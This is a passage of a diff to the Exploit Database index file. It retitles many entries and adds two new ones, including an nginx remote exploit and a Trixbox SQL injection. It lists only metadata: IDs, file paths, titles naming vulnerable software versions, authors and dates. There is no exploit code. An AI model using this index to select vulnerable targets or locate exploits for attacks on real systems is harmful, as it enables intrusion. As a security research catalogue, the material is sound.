Vulnerabilities",2012-05-02,"Ben Williams",cgi,webapps,0 18825,platforms/windows/remote/18825.rb,"VLC MMS Stream Handling Buffer Overflow",2012-05-03,metasploit,windows,remote,0 @@ -16385,7 +16385,7 @@ id,file,description,date,author,platform,type,port 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 +18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin 2.7.1 - 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 18990,platforms/php/webapps/18990.php,"Wordpress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18991,platforms/php/webapps/18991.php,"Wordpress Foxypress Plugin 0.4.1.1 - 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18993,platforms/php/webapps/18993.php,"Wordpress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -17483,7 +17483,7 @@ id,file,description,date,author,platform,type,port 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20166,platforms/php/webapps/20166.txt,"Joomla com_niceajaxpoll <= 1.3.0 - SQL Injection Vulnerability",2012-08-01,NLSecurity,php,webapps,0 20167,platforms/linux/dos/20167.txt,"eGlibc Signedness Code Execution Vulnerability",2012-08-01,c0ntex,linux,dos,0 -20168,platforms/php/remote/20168.pl,"pBot Remote Code Execution",2012-08-01,bwall,php,remote,0 +20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0 20170,platforms/php/webapps/20170.txt,"Joomla Movm Extension (com_movm) SQL Injection",2012-08-01,D4NB4R,php,webapps,0 20171,platforms/php/webapps/20171.txt,"ManageEngine Application Manager 10 - Multiple Vulnerabilities",2012-08-01,Vulnerability-Lab,php,webapps,0 20172,platforms/php/webapps/20172.txt,"ManageEngine Mobile Application Manager 10 - SQL Injection",2012-08-01,Vulnerability-Lab,php,webapps,0 @@ -17652,7 +17652,7 @@ id,file,description,date,author,platform,type,port 20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions Vulnerability",2000-11-01,miah,linux,local,0 20342,platforms/php/webapps/20342.php,"WespaJuris <= 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0 -20344,platforms/php/webapps/20344.php,"AraDown Blind SQL Injection",2012-08-08,G-B,php,webapps,0 +20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 20345,platforms/php/webapps/20345.txt,"iauto mobile application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP Persistent XSS Vulnerability",2012-08-08,Vulnerability-Lab,php,webapps,0 20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 \'id\' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 @@ -18776,7 +18776,7 @@ id,file,description,date,author,platform,type,port 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBMS 0.x Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21520,platforms/linux/remote/21520.py,"QNX QCONN Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 +21520,platforms/linux/remote/21520.py,"QNX QCONN 6.5.0 >=, >= 1.4.207944 - Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 Arbitrary Command Execution Vulnerability",2012-09-25,LiquidWorm,php,webapps,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion Vulnerabilities",2012-09-26,L0n3ly-H34rT,php,webapps,0 @@ -19663,7 +19663,7 @@ id,file,description,date,author,platform,type,port 22425,platforms/php/dos/22425.php,"PHP 4.x socket_recv() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22426,platforms/php/dos/22426.php,"PHP 4.x socket_recvfrom() Signed Integer Memory Corruption Vulnerability",2003-03-26,"Sir Mordred",php,dos,0 22427,platforms/php/webapps/22427.txt,"Wordpress All Video Gallery 1.1 - SQL Injection Vulnerability",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 -22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 +22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,metasploit,windows,remote,0 @@ -21357,7 +21357,7 @@ id,file,description,date,author,platform,type,port 24177,platforms/php/webapps/24177.txt,"NetWin SurgeMail 1.8/1.9/2.0,WebMail 3.1 Login Form XSS",2004-06-07,"Donnie Werner",php,webapps,0 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure Vulnerability",2004-06-08,"Vickenty Fesunov",linux,remote,0 -24180,platforms/php/webapps/24180.txt,"Invision Gallery SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 +24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 24181,platforms/openbsd/remote/24181.sh,"OpenBSD 3.x ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,remote,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection Vulnerability",2004-06-09,verb0s@virtualnova.net,php,webapps,0 @@ -22047,7 +22047,7 @@ id,file,description,date,author,platform,type,port 24914,platforms/php/webapps/24914.txt,"Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 -24917,platforms/windows/dos/24917.py,"Easy DVD Player (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 +24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 DoS",2013-04-05,npn,windows,dos,0 24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local Exploit",2013-04-07,"Matt Andreko",windows,local,0 24921,platforms/php/webapps/24921.txt,"OpenCart - Change User Password CSRF Vulnerability",2013-04-08,"Saadi Siddiqui",php,webapps,0 @@ -24588,7 +24588,7 @@ id,file,description,date,author,platform,type,port 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-08-12,LiquidWorm,php,webapps,80 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 -27525,platforms/php/webapps/27525.txt,"Integrated CMS - SQL Injection",2013-08-12,DSST,php,webapps,80 +27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27526,platforms/windows/remote/27526.txt,"Oracle Java storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails Known Secret Session Cookie Remote Code Execution",2013-08-12,metasploit,multiple,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-12,metasploit,hardware,remote,0 @@ -25485,7 +25485,7 @@ id,file,description,date,author,platform,type,port 28447,platforms/php/webapps/28447.php,"OsCommerce 2.1/2.2 Product_info.PHP SQL Injection Vulnerability",2006-08-30,"James Bercegay",php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 -28452,platforms/php/webapps/28452.txt,"Wordpress Lazy SEO plugin Shell Upload Vulnerability",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 +28452,platforms/php/webapps/28452.txt,"Wordpress Lazy SEO plugin 1.1.9 - Shell Upload Vulnerability",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 28453,platforms/php/webapps/28453.txt,"ezContents 2.0.3 event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28454,platforms/php/webapps/28454.txt,"ezContents 2.0.3 calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28455,platforms/php/webapps/28455.txt,"ezContents 2.0.3 gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 @@ -25727,7 +25727,7 @@ id,file,description,date,author,platform,type,port 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x /admin/header.inc.php Multiple Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x /footer.inc.php la_pow_by Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 -28709,platforms/php/webapps/28709.txt,"FlashChat - Arbitrary File Upload Vulnerability",2013-10-04,x-hayben21,php,webapps,80 +28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload Vulnerability",2013-10-04,x-hayben21,php,webapps,80 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 NSRunAlertPanel Remote Format String Vulnerability",2006-09-26,"Tom Ferris",osx,remote,0 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.PHP Cross-Site Scripting Vulnerability",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 @@ -26152,7 +26152,7 @@ id,file,description,date,author,platform,type,port 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 Dir Parameter Directory Traversal Vulnerability",2006-11-20,the_Edit0r,php,webapps,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 NWSPOOL.DLL Remote Buffer Overflow Vulnerability",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 -29150,platforms/php/webapps/29150.txt,"WordPress SAICO theme Arbitrary File Upload Vulnerability",2013-10-24,"Byakuya Kouta",php,webapps,0 +29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload Vulnerability",2013-10-24,"Byakuya Kouta",php,webapps,0 29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injection Vulnerabilities",2006-11-21,"laurent gaffie",asp,webapps,0 29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 @@ -26314,9 +26314,9 @@ id,file,description,date,author,platform,type,port 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Remote Arbitrary File Deletion Vulnerability",2013-11-01,LiquidWorm,php,webapps,0 -29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 +29330,platforms/php/webapps/29330.txt,"WordPress Switchblade Themes Arbitrary 1.3 - File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution Exploit",2013-11-01,LiquidWorm,php,webapps,0 -29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 +29332,platforms/php/webapps/29332.txt,"WordPress Think Responsive Themes 1.0 - Arbitrary File Upload Vulnerability",2013-11-01,"Byakuya Kouta",php,webapps,0 29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 Grup Variable SQL Injection Vulnerability",2006-12-22,ShaFuq31,asp,webapps,0 29334,platforms/cfm/webapps/29334.txt,"Future Internet index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet index.cfm categoryId Parameter XSS",2006-12-23,Linux_Drox,cfm,webapps,0 @@ -26629,7 +26629,7 @@ id,file,description,date,author,platform,type,port 29664,platforms/windows/dos/29664.txt,"Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Include Vulnerability",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,metasploit,hardware,remote,80 -29667,platforms/php/webapps/29667.txt,"Wordpress Euclid Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 +29667,platforms/php/webapps/29667.txt,"Wordpress Euclid Theme 1.x.x - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"Wordpress Dimension Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"Wordpress Amplus Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"Wordpress Make A Statement (MaS) Theme - CSRF Vulnerability",2013-11-18,DevilScreaM,php,webapps,80 @@ -27443,7 +27443,7 @@ id,file,description,date,author,platform,type,port 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera Web Interface admin/restartMessage.shtml server Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 Command Execution Vulnerability",2007-09-17,anonymous,php,webapps,0 -30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 +30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30590,platforms/windows/dos/30590.txt,"WinImage 8.0/8.10 - Malformed .IMG File BPB_BytsPerSec Field DoS",2007-09-17,j00ru//vx,windows,dos,0 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise <= 7.1 Remote Command Execution Vulnerability",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 30592,platforms/multiple/dos/30592.py,"Python 2.2 ImageOP Module Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",multiple,dos,0 @@ -27812,7 +27812,7 @@ id,file,description,date,author,platform,type,port 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 @@ -27892,8 +27892,8 @@ id,file,description,date,author,platform,type,port 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0 31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0 -31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 -31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 +31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 +31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0 @@ -28803,7 +28803,7 @@ id,file,description,date,author,platform,type,port 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 search.php _off Parameter XSS",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module 'id' Parameter SQL Injection Vulnerability",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 'blog.php' Local File Include Vulnerability",2008-07-07,Cod3rZ,php,webapps,0 -32017,platforms/php/webapps/32017.html,"VBulletin <= 3.7.1 admincp/faq.php Injection adminlog.php XSS",2008-07-08,"Jessica Hope",php,webapps,0 +32017,platforms/php/webapps/32017.html,"VBulletin <= 3.7.1 - admincp/faq.php Injection adminlog.php XSS",2008-07-08,"Jessica Hope",php,webapps,0 32018,platforms/linux/dos/32018.txt,"Multiple Vendors Unspecified SVG File Processing - Denial of Service Vulnerability",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat 'psxstr.c' STR Data Heap Based Buffer Overflow Vulnerability",2008-07-09,astrange,linux,dos,0 32020,platforms/php/webapps/32020.txt,"PageFusion 1.5 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps,0 @@ -29017,6 +29017,7 @@ id,file,description,date,author,platform,type,port 32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 +32239,platforms/php/webapps/32239.txt,"Trixbox All Versions - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection Vulnerability",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 'readmore.php' SQL Injection Vulnerability",2008-08-13,Rake,php,webapps,0 @@ -29051,29 +29052,30 @@ id,file,description,date,author,platform,type,port 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 'index.php' Cross-Site Scripting Vulnerability",2008-08-18,"ThE dE@Th",php,webapps,0 32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 32275,platforms/php/webapps/32275.txt,"itMedia Multiple SQL Injection Vulnerabilities",2008-08-18,baltazar,php,webapps,0 +32277,platforms/linux/remote/32277.txt,"nginx 1.4.0 64-bit - Remote Exploit for Linux (Generic)",2014-03-15,sorbo,linux,remote,0 32278,platforms/asp/webapps/32278.txt,"K Web CMS 'sayfala.asp' SQL Injection Vulnerability",2008-08-18,baltazar,asp,webapps,0 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0 -32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 +32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0 -32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0 +32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0 32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 'index.php' Local File Include Vulnerability",2008-08-21,"Beenu Arora",php,webapps,0 -32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 -32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 -32290,platforms/php/webapps/32290.txt,"Accellion File Transfer Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0 -32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0 +32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 +32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 +32290,platforms/php/webapps/32290.txt,"Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0 +32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0 32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service Vulnerability",2008-08-23,"Luka Treiber",linux,dos,0 32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0 32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0 32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 'surveyresults.asp' Cross Site Scripting Vulnerability",2008-08-26,"Bug Researchers Group",asp,webapps,0 -32298,platforms/php/webapps/32298.txt,"HP System Management Homepage (SMH) <= 2.1.12 'message.php' Cross Site Scripting Vulnerability",2008-08-26,"Luca Carettoni",php,webapps,0 -32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 'admin/login.php' Cross Site Scripting Vulnerability",2008-08-26,"Sam Georgiou",php,webapps,0 -32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 'search.asp' Cross-Site Scripting Vulnerability",2008-08-26,JoCk3r,asp,webapps,0 +32298,platforms/php/webapps/32298.txt,"HPSystem Management Homepage (SMH) <= 2.1.12 - 'message.php' Cross Site Scripting Vulnerability",2008-08-26,"Luca Carettoni",php,webapps,0 +32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 - 'admin/login.php' Cross Site Scripting Vulnerability",2008-08-26,"Sam Georgiou",php,webapps,0 +32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting Vulnerability",2008-08-26,JoCk3r,asp,webapps,0 32301,platforms/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 File Transfer Directory Traversal Vulnerability",2008-08-26,"Seth Fogie",windows,remote,0 32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 'adv_cat.php' Cross-Site Scripting Vulnerability",2008-08-27,"Bug Researchers Group",php,webapps,0 